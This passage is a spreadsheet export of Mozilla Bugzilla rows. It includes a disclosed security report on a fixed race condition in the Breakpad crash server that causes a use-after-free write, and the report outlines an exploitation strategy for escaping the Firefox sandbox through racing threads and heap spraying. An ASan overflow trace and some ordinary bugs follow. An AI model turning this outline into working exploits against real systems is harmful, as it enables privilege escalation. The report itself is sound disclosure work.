          <t>Race condition in google_breakpad::CrashGenerationServer::AddClient leading to UAF write in broker (Sandbox escape / LPE)</t>
        </is>
      </c>
      <c r="D3811" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:06 -0700</t>
        </is>
      </c>
      <c r="E3811" t="n">
        <v>1</v>
      </c>
      <c r="F3811" t="n">
        <v>1</v>
      </c>
      <c r="G3811" t="n">
        <v>3</v>
      </c>
      <c r="H3811" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3811" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3811" t="inlineStr">
        <is>
          <t>Crash Reporting</t>
        </is>
      </c>
      <c r="K3811" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3811" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3811" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3811" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3811" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3811" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q3811" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3811" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3811" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T3811" t="n">
        <v>1</v>
      </c>
      <c r="U3811" t="n">
        <v>0</v>
      </c>
      <c r="V3811" t="n">
        <v>14</v>
      </c>
      <c r="W3811" t="inlineStr">
        <is>
          <t>Created attachment 9056367
race_asan_report.txt
Hi,
There is a race condition in the Windows implementation of the CrashGenerationServer leading to a write of a freed object in Firefox main process. This crash server is enabled by default on Firefox release build and any sandboxed processes can send messages on a pipe : "\\.\pipe\gecko-crash-server-pipe.{ParentPID}" (passed to the sandbox in the command line).
The vulnerability exists in the following function:
```cpp
bool CrashGenerationServer::AddClient(ClientInfo* client_info) {
  HANDLE request_wait_handle = NULL;
  /* ... */ 
  // OnClientEnd will be called when the client process terminates.
  HANDLE process_wait_handle = NULL;
  if (!RegisterWaitForSingleObject(&amp;process_wait_handle,
                                   client_info-&gt;process_handle(),
                                   OnClientEnd, // This callback can FREE client_info (no lock)
                                   client_info,
                                   INFINITE,
                                   WT_EXECUTEONLYONCE)) {
    return false;
  }
  client_info-&gt;set_process_exit_wait_handle(process_wait_handle); // UAF write (crash)
/* ... */
}
```
The OnClientEnd callback frees the client_info by calling the following function:
```cpp
CrashGenerationServer::HandleClientProcessExit(ClientInfo* client_info) { // Called by CrashGenerationServer::OnClientEnd
/* ... code that doesn't block / wait  */
  delete client_info; // FREE client_info
}
```
Crash:
To compile an ASAN build of the client, you need to remove this line from the build config:
`ac_add_options --disable-crashreporter`
See attachment the ASAN crash report "race_asan_report.txt" reproduced on a local build (changeset 527669:bd1e28b0143b from Mar 29).
Exploitability:
The exploitation assumes having code execution in sandboxed renderers processes (RCE -&gt; *LPE* step targeted).
The only way to trigger the `OnClientEnd` callback is to terminate the process being registered.
The pipe is created with maximum one instance (`nMaxInstances=1` and `FILE_FLAG_FIRST_PIPE_INSTANCE`), so you have one shot by process (you can't spray connections to `AddClient`) but the crash generation server doesn't check if the registered client is already registered and if its PID matches the caller on the pipe (one process can register anyone see `HandleReadDoneState`).
To exploit this, you can either have two threads in one process, one sending the `ProtocolMessage` to add the client and the other one terminating the process OR two sandboxed process, one registering the other process and the other killing itself.
If it's not successful, ask the broker to create a new tab (new process), replay your RCE to gain code execution and retry.
If successful, the UAF gives you a `HANDLE` write at a fixed offset in the broker heap.
By spraying an exploit convenient object (semi controlled by another IPC channel to the broker like IPDL), you can use this vulnerability to corrupt a field (size/flags) in it and with some work, achieve code execution in Firefox main process (Sandbox escape). 
Thank you</t>
        </is>
      </c>
      <c r="X3811" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3812">
      <c r="A3812" t="n">
        <v>1337244</v>
      </c>
      <c r="B3812" t="inlineStr">
        <is>
          <t>2017-02-06 20:00:23 -0800</t>
        </is>
      </c>
      <c r="C3812" t="inlineStr">
        <is>
          <t>Notification for new device connected to this account is displayed on the device being connected</t>
        </is>
      </c>
      <c r="D3812" t="inlineStr">
        <is>
          <t>2017-02-16 17:14:23 -0800</t>
        </is>
      </c>
      <c r="E3812" t="n">
        <v>1</v>
      </c>
      <c r="F3812" t="n">
        <v>1</v>
      </c>
      <c r="G3812" t="n">
        <v>2</v>
      </c>
      <c r="H3812" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3812" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3812" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K3812" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3812" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3812" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3812" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3812" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3812" t="inlineStr"/>
      <c r="Q3812" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3812" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3812" t="inlineStr">
        <is>
          <t>Firefox 54</t>
        </is>
      </c>
      <c r="T3812" t="n">
        <v>1</v>
      </c>
      <c r="U3812" t="n">
        <v>0</v>
      </c>
      <c r="V3812" t="n">
        <v>12</v>
      </c>
      <c r="W3812" t="inlineStr">
        <is>
          <t>STR:
* Delete the chrome://FxAccounts login so sync credentials are lost
* Try to sync - notice you are forced into a "needs reauth" state.
* Re-authenticate
Actual:
* A notification is displayed indicating this device has been connected to sync.
Expected:
* Only other devices see that notification.
It's not clear if this also happens on an initial connection, or only on reconnection. Logs show:
&gt; 1486439531220	FirefoxAccounts	TRACE	observed topic=push-message, data=chrome://fxa-device-update, subject=[xpconnect wrapped nsISupports]
It's also not clear if it is expected that the push message goes to this new device - Ryan?</t>
        </is>
      </c>
      <c r="X3812" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3813">
      <c r="A3813" t="n">
        <v>765621</v>
      </c>
      <c r="B3813" t="inlineStr">
        <is>
          <t>2012-06-17 14:29:53 -0700</t>
        </is>
      </c>
      <c r="C3813" t="inlineStr">
        <is>
          <t>Out of bounds read in IsCSSWordSpacingSpace</t>
        </is>
      </c>
      <c r="D3813" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:40 -0700</t>
        </is>
      </c>
      <c r="E3813" t="n">
        <v>1</v>
      </c>
      <c r="F3813" t="n">
        <v>1</v>
      </c>
      <c r="G3813" t="n">
        <v>3</v>
      </c>
      <c r="H3813" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3813" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3813" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K3813" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3813" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3813" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3813" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3813" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3813" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3813" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3813" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3813" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T3813" t="n">
        <v>1</v>
      </c>
      <c r="U3813" t="n">
        <v>0</v>
      </c>
      <c r="V3813" t="n">
        <v>38</v>
      </c>
      <c r="W3813" t="inlineStr">
        <is>
          <t>Created attachment 633924
Testcase
Reproduces on trunk, run testcase from command line. You also need the empty test.js as in archive.
20120617120215
http://hg.mozilla.org/mozilla-central/rev/b1a0fb2bdbf7
=================================================================
==27356== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fe2faee2f82 at pc 0x7fe3281b3821 bp 0x7fffdbd009d0 sp 0x7fffdbd009c8
READ of size 1 at 0x7fe2faee2f82 thread T0
    #0 0x7fe3281b3821 in nsTextFragment::CharAt(int) const firefox/src/modules/zlib/src/inffast.c:0
    #1 0x7fe328cca8a6 in IsCSSWordSpacingSpace(nsTextFragment const*, unsigned int, nsStyleText const*) firefox/src/layout/generic/nsTextFrameThebes.cpp:624
    #2 0x7fe328cc811f in PropertyProvider::GetSpacingInternal(unsigned int, unsigned int, gfxFont::Spacing*, bool) firefox/src/layout/generic/nsTextFrameThebes.cpp:2817
    #3 0x7fe328cc731d in PropertyProvider::GetSpacing(unsigned int, unsigned int, gfxFont::Spacing*) firefox/src/layout/generic/nsTextFrameThebes.cpp:2776
    #4 0x7fe33382d073 in GetAdjustedSpacing(gfxTextRun*, unsigned int, unsigned int, gfxTextRun::PropertyProvider*, gfxFont::Spacing*) firefox/src/gfx/thebes/gfxFont.cpp:4489
    #5 0x7fe333838a98 in gfxTextRun::BreakAndMeasureText(unsigned int, unsigned int, bool, double, gfxTextRun::PropertyProvider*, bool, double*, gfxFont::RunMetrics*, gfxFont::BoundingBoxType, gfxContext*, bool*, unsigned int*, bool, gfxBreakPriority*) firefox/src/gfx/thebes/gfxFont.cpp:4866
    #6 0x7fe328d43127 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) firefox/src/layout/generic/nsTextFrameThebes.cpp:7477
    #7 0x7fe328b54e98 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:836
    #8 0x7fe328b2586d in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) firefox/src/layout/generic/nsInlineFrame.cpp:680
    #9 0x7fe328b21f9d in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) firefox/src/layout/generic/nsInlineFrame.cpp:543
    #10 0x7fe328b1f2aa in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsInlineFrame.cpp:397
    #11 0x7fe328b54b1f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:824
    #12 0x7fe328810a7f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) firefox/src/layout/generic/nsBlockFrame.cpp:3834
    #13 0x7fe32880a4da in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) firefox/src/layout/generic/nsBlockFrame.cpp:3630
    #14 0x7fe3287fcf57 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:3482
    #15 0x7fe3287eb90c in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:2570
    #16 0x7fe3287d0d71 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:2020
    #17 0x7fe3287c480f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:1069
    #18 0x7fe328854a8b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockReflowContext.cpp:262
    #19 0x7fe3287f5d77 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:3206
    #20 0x7fe3287eb466 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:2514
    #21 0x7fe3287d0d71 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:2020
    #22 0x7fe3287c480f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:1069
    #23 0x7fe3288b4527 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #24 0x7fe3289fe1ae in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) firefox/src/layout/generic/nsGfxScrollFrame.cpp:516
    #25 0x7fe328a03a5a in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) firefox/src/layout/generic/nsGfxScrollFrame.cpp:616
    #26 0x7fe328a07d7f in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsGfxScrollFrame.cpp:857
    #27 0x7fe328b54b1f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:824
    #28 0x7fe328810a7f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) firefox/src/layout/generic/nsBlockFrame.cpp:3834
    #29 0x7fe32880a4da in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) firefox/src/layout/generic/nsBlockFrame.cpp:3630
    #30 0x7fe3287fcf57 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:3482
    #31 0x7fe3287eb90c in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:2570
    #32 0x7fe3287d0d71 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:2020
    #33 0x7fe3287c480f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:1069
    #34 0x7fe328b54b1f in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) firefox/src/layout/generic/nsLineLayout.cpp:824
    #35 0x7fe328810a7f in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) firefox/src/layout/generic/nsBlockFrame.cpp:3834
    #36 0x7fe32880af87 in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) firefox/src/layout/generic/nsBlockFrame.cpp:3665
    #37 0x7fe3287fcf57 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:3482
    #38 0x7fe3287eb90c in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:2570
    #39 0x7fe3287d0d71 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:2020
    #40 0x7fe3287c480f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:1069
    #41 0x7fe328854a8b in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockReflowContext.cpp:262
    #42 0x7fe3287f5d77 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:3206
    #43 0x7fe3287eb466 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) firefox/src/layout/generic/nsBlockFrame.cpp:2514
    #44 0x7fe3287d0d71 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:2020
    #45 0x7fe3287c480f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsBlockFrame.cpp:1069
    #46 0x7fe3288b4527 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #47 0x7fe328a83b57 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsCanvasFrame.cpp:429
    #48 0x7fe3288b4527 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #49 0x7fe3289fe1ae in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) firefox/src/layout/generic/nsGfxScrollFrame.cpp:516
    #50 0x7fe328a03a5a in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) firefox/src/layout/generic/nsGfxScrollFrame.cpp:616
    #51 0x7fe328a07d7f in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsGfxScrollFrame.cpp:857
    #52 0x7fe3288b4527 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) firefox/src/layout/generic/nsContainerFrame.cpp:906
    #53 0x7fe328ddbb81 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) firefox/src/layout/generic/nsViewportFrame.cpp:200
    #54 0x7fe32853d016 in PresShell::DoReflow(nsIFrame*, bool) firefox/src/layout/base/nsPresShell.cpp:7382
    #55 0x7fe32856aaad in PresShell::ProcessReflowCommands(bool) firefox/src/layout/base/nsPresShell.cpp:7523
    #56 0x7fe3285691bd in PresShell::FlushPendingNotifications(mozFlushType) firefox/src/layout/base/nsPresShell.cpp:3852
    #57 0x7fe32836ba9f in DocumentViewerImpl::LoadComplete(unsigned int) firefox/src/layout/base/nsDocumentViewer.cpp:982
    #58 0x7fe32fbd7a68 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) firefox/src/docshell/base/nsDocShell.cpp:6241
    #59 0x7fe32fbcf7a1 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) firefox/src/docshell/base/nsDocShell.cpp:6072
    #60 0x7fe32fbd0965 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) firefox/src/modules/zlib/src/inffast.c:0
    #61 0x7fe32fcd5004 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, unsigned int) firefox/src/uriloader/base/nsDocLoader.cpp:1352
    #62 0x7fe32fcd2a15 in nsDocLoader::doStopDocumentLoad(nsIRequest*, unsigned int) firefox/src/uriloader/base/nsDocLoader.cpp:930
    #63 0x7fe32fccbc68 in nsDocLoader::DocLoaderIsEmpty(bool) firefox/src/uriloader/base/nsDocLoader.cpp:822
0x7fe2faee2f82 is located 0 bytes to the right of 2-byte region [0x7fe2faee2f80,0x7fe2faee2f82)
allocated by thread T0 here:
    #0 0x4a3662 in malloc ??:0
    #1 0x7fe33fbcc737 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7fe333280083 in NS_Alloc_P firefox/src/xpcom/base/nsMemoryImpl.cpp:163
    #3 0x7fe326c9b033 in nsMemory::Alloc(unsigned long) firefox/src/../../../dist/include/nsMemory.h:36
    #4 0x7fe32a1fd170 in nsTextFragment::Append(unsigned short const*, unsigned int, bool) firefox/src/content/base/src/nsTextFragment.cpp:382
    #5 0x7fe329f3deb7 in nsGenericDOMDataNode::SetTextInternal(unsigned int, unsigned int, unsigned short const*, unsigned int, bool, CharacterDataChangeInfo::Details*) firefox/src/content/base/src/nsGenericDOMDataNode.cpp:312
    #6 0x7fe329f4ccbc in nsGenericDOMDataNode::AppendText(unsigned short const*, unsigned int, bool) firefox/src/content/base/src/nsGenericDOMDataNode.cpp:858
    #7 0x7fe32d0dd860 in nsHtml5TreeOperation::AppendTextToTextNode(unsigned short const*, unsigned int, nsIContent*, nsHtml5TreeOpExecutor*) firefox/src/parser/html/nsHtml5TreeOperation.cpp:140
    #8 0x7fe32d0dee80 in nsHtml5TreeOperation::AppendText(unsigned short const*, unsigned int, nsIContent*, nsHtml5TreeOpExecutor*) firefox/src/parser/html/nsHtml5TreeOperation.cpp:155
    #9 0x7fe32d0e8c5f in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) firefox/src/parser/html/nsHtml5TreeOperation.cpp:451
    #10 0x7fe32d107856 in nsHtml5TreeOpExecutor::RunFlushLoop() firefox/src/parser/html/nsHtml5TreeOpExecutor.cpp:564
    #11 0x7fe32d117065 in nsHtml5ExecutorReflusher::Run() firefox/src/parser/html/nsHtml5TreeOpExecutor.cpp:63
    #12 0x7fe3331ff2c3 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #13 0x7fe332e8e8dd in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #14 0x7fe331ff4ee6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #15 0x7fe3334afcda in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #16 0x7fe3334afb23 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #17 0x7fe3334afa08 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #18 0x7fe33152352e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #19 0x7fe33016b098 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:256
    #20 0x7fe326b3ee17 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3785
    #21 0x7fe326b457d2 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3862
    #22 0x7fe326b48c8b in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3938
==27356== ABORTING
Stats: 154M malloced (167M for red zones) by 355141 calls
Stats: 44M realloced by 19866 calls
Stats: 114M freed by 225726 calls
Stats: 0M really freed by 0 calls
Stats: 352M (90162 full pages) mmaped in 88 calls
  mmaps   by size class: 8:278511; 9:57337; 10:20475; 11:18423; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:160; 19:56; 20:16;
  mallocs by size class: 8:265584; 9:48356; 10:17023; 11:17025; 12:2568; 13:1904; 14:1480; 15:341; 16:526; 17:112; 18:159; 19:49; 20:14;
  frees   by size class: 8:155781; 9:37742; 10:13552; 11:13792; 12:1632; 13:994; 14:1281; 15:284; 16:456; 17:98; 18:57; 19:46; 20:11;
  rfrees  by size class:
Stats: malloc large: 334 small slow: 1873
Shadow byte and word:
  0x1ffc5f5dc5f0: 2
  0x1ffc5f5dc5f0: 02 fb fb fb fb fb fb fb
More shadow bytes:
  0x1ffc5f5dc5d0: fd fd fd fd fd fd fd fd
  0x1ffc5f5dc5d8: fd fd fd fd fd fd fd fd
  0x1ffc5f5dc5e0: fa fa fa fa fa fa fa fa
  0x1ffc5f5dc5e8: fa fa fa fa fa fa fa fa
=&gt;0x1ffc5f5dc5f0: 02 fb fb fb fb fb fb fb
  0x1ffc5f5dc5f8: fb fb fb fb fb fb fb fb
  0x1ffc5f5dc600: fa fa fa fa fa fa fa fa
  0x1ffc5f5dc608: fa fa fa fa fa fa fa fa
  0x1ffc5f5dc610: 00 00 00 00 00 00 00 00</t>
        </is>
      </c>
      <c r="X3813" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3814">
      <c r="A3814" t="n">
        <v>1096316</v>
      </c>
      <c r="B3814" t="inlineStr">
        <is>
          <t>2014-11-10 06:35:16 -0800</t>
        </is>
      </c>
      <c r="C3814" t="inlineStr">
        <is>
          <t>Linux x64opt R-e10s job doesn't show reftest analyzer link in Treeherder</t>
        </is>
      </c>
      <c r="D3814" t="inlineStr">
        <is>
          <t>2015-05-20 04:29:51 -0700</t>
        </is>
      </c>
      <c r="E3814" t="n">
        <v>1</v>
      </c>
      <c r="F3814" t="n">
        <v>1</v>
      </c>
      <c r="G3814" t="n">
        <v>7</v>
      </c>
      <c r="H3814" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3814" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3814" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3814" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3814" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3814" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3814" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3814" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3814" t="inlineStr"/>
      <c r="Q3814" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3814" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3814" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3814" t="n">
        <v>1</v>
      </c>
      <c r="U3814" t="n">
        <v>0</v>
      </c>
      <c r="V3814" t="n">
        <v>9</v>
      </c>
      <c r="W3814" t="inlineStr">
        <is>
          <t>See for example https://treeherder.mozilla.org/ui/#/jobs?repo=try&amp;revision=99e3b8967dce - there is an orange R-e10s job, but no reftest analyzer link. The same cset on tbpl does have a reftest analyzer link.</t>
        </is>
      </c>
      <c r="X3814" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3815">
      <c r="A3815" t="n">
        <v>1249081</v>
      </c>
      <c r="B3815" t="inlineStr">
        <is>
          <t>2016-02-17 11:15:16 -0800</t>
        </is>
      </c>
      <c r="C3815" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow write in [@graphite2::Slot::setAttr]</t>
        </is>
      </c>
      <c r="D3815" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:10 -0700</t>
        </is>
      </c>
      <c r="E3815" t="n">
        <v>1</v>
      </c>
      <c r="F3815" t="n">
        <v>1</v>
      </c>
      <c r="G3815" t="n">
        <v>3</v>
      </c>
      <c r="H3815" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3815" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3815" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3815" t="inlineStr">
        <is>
